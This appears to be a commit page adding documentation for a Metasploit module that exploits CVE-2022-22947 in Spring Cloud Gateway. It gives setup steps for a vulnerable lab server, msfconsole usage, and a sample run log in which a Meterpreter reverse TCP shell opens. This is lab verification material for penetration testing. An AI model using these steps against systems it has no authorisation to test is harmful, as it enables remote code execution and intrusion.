Adding CVE-2022-22947 Spring Cloud Gateway RCE Exploit
CVE-2022-22947 exploits Spring Cloud Gateway. The module has been tested with Spring Cloud gateway version 3.1.0 on Linux kali 5.18.0-kali5-amd64
This commit is contained in:
Ayantaker
@@ -0,0 +1,66 @@
|
||||
## Vulnerable Application
|
||||
|
||||
The vulnerability exploits [CVE-2022-22947](https://nvd.nist.gov/vuln/detail/CVE-2022-22947) an RCE vulnerability in Spring Cloud Gateway. According to [VMware](https://tanzu.vmware.com/security/cve-2022-22947), the versions affected are :
|
||||
|
||||
- 3.1.0
|
||||
- 3.0.0 to 3.0.6
|
||||
- Older, unsupported versions are also affected
|
||||
|
||||
This demo [project](https://github.com/wdahlenburg/spring-gateway-demo) can be used to run a vulnerable server
|
||||
|
||||
### Installation Instructions
|
||||
|
||||
```bash
|
||||
# To use the pre-compile vulnerable application
|
||||
wget https://github.com/wdahlenburg/spring-gateway-demo/releases/download/v.0.0.1/spring-gateway-demo-0.0.1-SNAPSHOT.jar
|
||||
sudo apt install default-jdk
|
||||
java -jar spring-gateway-demo-0.0.1-SNAPSHOT.jar ## This will host the app on port 9000
|
||||
|
||||
|
||||
# If you want to compile for a version of spring cloud gateway on your own
|
||||
git clone https://github.com/wdahlenburg/spring-gateway-demo.git
|
||||
|
||||
## In pom.xml, change the version in '<spring-cloud.version>2021.0.1-SNAPSHOT</spring-cloud.version>'. To see which spring cloud version includes which version of spring cloud gateway, look here : https://repo1.maven.org/maven2/org/springframework/cloud/spring-cloud-dependencies/
|
||||
|
||||
apt install maven
|
||||
mvn package -DskipTests
|
||||
java -jar target/spring-gateway-demo-0.0.1-SNAPSHOT.jar ## This will host the app on port 9000
|
||||
```
|
||||
|
||||
|
||||
## Verification Steps
|
||||
|
||||
- Run the vulnerable server
|
||||
- Start msfconsole
|
||||
- Do: `use exploit/linux/http/spring_cloud_gateway_rce`
|
||||
- Do: `set RHOSTS <server_ip>`
|
||||
- Do: `set RPORT 9000`
|
||||
- Do: `run`
|
||||
- You should get a meterpreter shell.
|
||||
|
||||
|
||||
### Spring Cloud gateway version 3.1.0 on Linux kali 5.18.0-kali5-amd64
|
||||
|
||||
```
|
||||
msf6 > use exploit/linux/http/spring_cloud_gateway_rce
|
||||
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
|
||||
msf6 exploit(linux/http/spring_cloud_gateway_rce) > set RHOSTS 192.168.19.140
|
||||
RHOSTS => 192.168.19.140
|
||||
msf6 exploit(linux/http/spring_cloud_gateway_rce) > set RPORT 9000
|
||||
RPORT => 9000
|
||||
msf6 exploit(linux/http/spring_cloud_gateway_rce) > run
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.19.140:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[*] Checking if server vulnerable
|
||||
[+] Route deleted
|
||||
[+] The target is vulnerable.
|
||||
[+] Created route successfully with the reverse shell
|
||||
[*] Trigerring reverse shell
|
||||
[*] Sending stage (3020772 bytes) to 192.168.19.140
|
||||
[*] Meterpreter session 1 opened (192.168.19.140:4444 -> 192.168.19.140:59916) at 2022-10-01 14:21:31 -0400
|
||||
[+] Route deleted
|
||||
[+] Enjoy your Shell
|
||||
|
||||
meterpreter >
|
||||
```
|
||||
Reference in New Issue
Block a user